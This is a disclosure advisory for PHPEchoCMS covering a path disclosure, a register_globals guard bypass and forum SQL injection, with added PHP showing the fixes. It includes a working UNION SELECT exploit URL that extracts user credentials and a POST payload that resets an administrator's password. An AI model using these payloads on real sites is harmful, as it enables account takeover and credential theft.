SECURITYVULNS:DOC:18885
Jan 17, 2008

PHPEchoCMS Multiple remote vulnerabilities

vulners.com

Hello,

PHPEchoCMS Multiple remote vulnerabilities

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

First: full path disclosure in
kernel/init.php
modules/admin/index.php

Every file that is meant to be included checks for the variable $BASE_LOAD,
but if register_globals is on, that variable can be set from the browser like this:
modules/files/index.php?BASE_LOAD=1

The script then continues to run; the same applies to other files.
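The following is an added example, not PHPEchoCMS code, that shows why a guard built on a plain variable is defeated by register_globals and how a constant-based guard avoids the problem. The exact shape of the CMS's check is not on the page; the variable check below is assumed from the advisory's description, and the function names are hypothetical.

```php
<?php
// Added example (not PHPEchoCMS code): variable-based include guard versus
// constant-based include guard under register_globals.

// The advisory says each module checks a variable named $BASE_LOAD that
// kernel/init.php is expected to set. With register_globals=On, a request to
// modules/files/index.php?BASE_LOAD=1 creates $BASE_LOAD before the check runs,
// so the check passes even though init.php never executed.

// Weak guard (shape assumed from the advisory's description): the caller
// passes the global symbol table, which register_globals has populated.
function guard_by_variable(array $globals): bool
{
    return !empty($globals['BASE_LOAD']);
}

// Hardened guard: a PHP constant cannot be created from the query string, so
// only a request whose entry point really ran kernel/init.php satisfies it.
function guard_by_constant(): bool
{
    return defined('BASE_LOAD');
}

// Constructed request state: what $GLOBALS looks like after register_globals
// has processed "?BASE_LOAD=1".
$simulatedGlobals = ['BASE_LOAD' => '1'];

var_dump(guard_by_variable($simulatedGlobals)); // bool(true): the guard is bypassed
var_dump(guard_by_constant());                  // bool(false): init.php never ran

// What kernel/init.php would do in the hardened design.
define('BASE_LOAD', true);
var_dump(guard_by_constant());                  // bool(true)

// A module would then start with:
//   if (!defined('BASE_LOAD')) { header('HTTP/1.0 403 Forbidden'); exit; }
```

register_globals is a PHP_INI_PERDIR setting, so it cannot be switched off with ini_set() from inside the script; it has to be disabled in php.ini or per directory, and the constant-based guard protects the modules regardless of that setting.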

modules/forum/index.php
lines [31-49]
if (@$_POST['post']=='thread')
{
    if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])
    {
        // Add the thread to the specified section
        $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', '".addslashes($_POST['id'])."', '-1',
            '".addslashes($_POST['title']).
            "', '".str_replace("\n", "<br>", addslashes($_POST['contents']))."',
            '".$_SESSION['username']."','".date("d-m-Y H:i")."', '0')";
        $res = query($ins, 1);
        $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE
            `id`=".addslashes($_POST['id']);
        $res = query($ins, 1);
        $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);
        redirect ("index.php?module=forum&show=thread&id=".$nb);
    }
    else
    {
        $content = $mlang['017'];
    }
}

See
$ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y H:i")." WHERE
    `id`=".addslashes($_POST['id']);

Because the id is concatenated into the query without quotes, addslashes() does not help: it could be modified into an update query by posting the value of id as follows
id=union update members set password=[value] where id=1

Of course the value here should be an MD5 hash, and without the brackets, so the query is valid :)

lines [138-142]

elseif (@$_GET['show']=='thread' && $_GET['id'])
{
    // Show a thread and its replies (child-threads)

    $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id=".addslashes($_GET['id']), 4);

replace with
elseif (@$_GET['show']=='thread' && $_GET['id'])
{
    // Show a thread and its replies (child-threads)

    $thread = query("SELECT * FROM `".PREFIX."threads` WHERE id='".intval($_GET['id'])."'", 4);

exploit
index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*
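Both injection points above (the section UPDATE fed from $_POST['id'] and the thread SELECT fed from $_GET['id']) share one root cause: addslashes() only escapes quote characters, and a value interpolated into an unquoted numeric position never needs a quote to break out. The advisory's own fix uses intval(); the added example below, which is not PHPEchoCMS code, goes one step further and rewrites both queries with PDO prepared statements against an in-memory SQLite database. The table prefix `phpecms_` is assumed from the exploit URL, the schema is a constructed stand-in, and the function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example (not PHPEchoCMS code): the thread lookup and the section
// "lastdate" update rewritten with bound parameters. Table names follow the
// advisory's queries; the columns are a constructed stand-in so that the
// script runs offline against SQLite.

const PREFIX = 'phpecms_';   // assumed prefix, taken from the phpecms_users name in the exploit URL

// Hypothetical helper: build an in-memory database with one constructed thread.
function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE ' . PREFIX . 'threads (id INTEGER PRIMARY KEY, section INTEGER, title TEXT)');
    $db->exec('CREATE TABLE ' . PREFIX . 'sections (id INTEGER PRIMARY KEY, lastdate TEXT)');
    $db->exec("INSERT INTO " . PREFIX . "threads VALUES (1, 7, 'constructed thread')");
    $db->exec("INSERT INTO " . PREFIX . "sections VALUES (7, '')");
    return $db;
}

// The vulnerable pattern from the advisory, kept only to show the resulting
// SQL text: addslashes() escapes quotes, but there is no quote to escape here.
function thread_sql_unsafe(string $id): string
{
    return "SELECT * FROM `" . PREFIX . "threads` WHERE id=" . addslashes($id);
}

// Hardened lookup: the id must be a plain unsigned integer string and is sent
// to the database as a bound integer, never concatenated into the statement.
function fetch_thread(PDO $db, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {
        return null;                       // reject anything that is not all digits
    }
    $stmt = $db->prepare('SELECT id, section, title FROM ' . PREFIX . 'threads WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened section update: both the date and the id are bound values, which
// also fixes the unquoted date literal seen in the original UPDATE.
function touch_section(PDO $db, string $rawId): int
{
    if (!ctype_digit($rawId)) {
        return 0;
    }
    $stmt = $db->prepare('UPDATE ' . PREFIX . 'sections SET lastdate = :d WHERE id = :id');
    $stmt->bindValue(':d', date('d-m-Y H:i'));
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

$db = make_db();
$bad = '-1 union select 1,2,3';            // constructed input in the shape the advisory describes

echo thread_sql_unsafe($bad), "\n";        // the payload survives addslashes() unchanged
var_dump(fetch_thread($db, $bad));         // NULL: rejected before it reaches the database
var_dump(fetch_thread($db, '1'));          // the constructed thread row
var_dump(touch_section($db, '7'));         // int(1)
var_dump(touch_section($db, '7 or 1=1'));  // int(0): rejected
```

The ctype_digit() check is a belt-and-braces step; with PDO::PARAM_INT binding the parameter is already sent separately from the statement text, so the database never parses user input as SQL. Note that the original section UPDATE also interpolates date("d-m-Y H:i") without quotes, which is a bug independent of the injection and disappears once the date is bound as a parameter.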

WwW.SoQoR.NeT